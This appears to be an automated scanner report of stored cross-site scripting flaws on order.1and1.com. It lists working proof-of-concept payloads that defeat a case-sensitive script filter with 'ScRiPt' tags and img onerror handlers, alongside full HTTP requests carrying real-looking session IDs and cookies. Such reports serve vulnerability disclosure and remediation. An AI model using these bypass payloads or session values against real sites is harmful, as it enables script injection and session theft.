Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.
The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.
Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).
Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.
Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 3 submitted to the URL /xml/order/CloudDynamicServer is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/CloudDynamicServer. The payload be5ae</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>0f854fb8bb3 was submitted in the REST URL parameter 3. This input was returned as be5ae</ScRiPt ><ScRiPt>alert(1)</ScRiPt>0f854fb8bb3 in a subsequent request for the URL /xml/order/CloudDynamicServer.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
The value of REST URL parameter 3 submitted to the URL /xml/order/DomaininfoMove is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/DomaininfoMove. The payload d1dbe</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>3ccb96b7437 was submitted in the REST URL parameter 3. This input was returned as d1dbe</ScRiPt ><ScRiPt>alert(1)</ScRiPt>3ccb96b7437 in a subsequent request for the URL /xml/order/DomaininfoMove.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/DomaininfoMoved1dbe</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>3ccb96b7437;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domainTransfer HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domainTransfer HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/Eshops is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Eshops. The payload f145e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>222daa67bf5 was submitted in the REST URL parameter 3. This input was returned as f145e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>222daa67bf5 in a subsequent request for the URL /xml/order/Eshops.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/Eshopsf145e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>222daa67bf5;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureDatabaseDatabase is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureDatabaseDatabase. The payload 9ead5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>428693372d0 was submitted in the REST URL parameter 3. This input was returned as 9ead5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>428693372d0 in a subsequent request for the URL /xml/order/FeatureDatabaseDatabase.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/FeatureDatabaseDatabase9ead5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>428693372d0;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureDatabaseDatabase;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureEmailEmail is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureEmailEmail. The payload f6a45</ScRiPt%20>ca9d9974f55 was submitted in the REST URL parameter 3. This input was returned as f6a45</ScRiPt >ca9d9974f55 in a subsequent request for the URL /xml/order/FeatureEmailEmail.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/FeatureEmailEmailf6a45</ScRiPt%20>ca9d9974f55;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureEmailEmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureEmailWebmail is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureEmailWebmail. The payload 45663</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>f29e6be5a86 was submitted in the REST URL parameter 3. This input was returned as 45663</ScRiPt ><ScRiPt>alert(1)</ScRiPt>f29e6be5a86 in a subsequent request for the URL /xml/order/FeatureEmailWebmail.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/FeatureEmailWebmail45663</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>f29e6be5a86;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureEmailWebmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureGuaranteeMoneyback is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureGuaranteeMoneyback. The payload 83c9e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>eed4e62047d was submitted in the REST URL parameter 3. This input was returned as 83c9e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>eed4e62047d in a subsequent request for the URL /xml/order/FeatureGuaranteeMoneyback.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/FeatureGuaranteeMoneyback83c9e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>eed4e62047d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureGuaranteeMoneyback;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureMarketingCtrCitysearch is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureMarketingCtrCitysearch. The payload 649d3</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>b5a1ad5a333 was submitted in the REST URL parameter 3. This input was returned as 649d3</ScRiPt ><img src=a onerror=alert(1)>b5a1ad5a333 in a subsequent request for the URL /xml/order/FeatureMarketingCtrCitysearch.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request 1
GET /xml/order/FeatureMarketingCtrCitysearch649d3</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>b5a1ad5a333;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/FeatureMarketingCtrCitysearch;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/FeatureMarketingCtrStat is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/FeatureMarketingCtrStat. The payload ccb50</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>3147a128d82 was submitted in the REST URL parameter 3. This input was returned as ccb50</ScRiPt ><img src=a onerror=alert(1)>3147a128d82 in a subsequent request for the URL /xml/order/FeatureMarketingCtrStat.
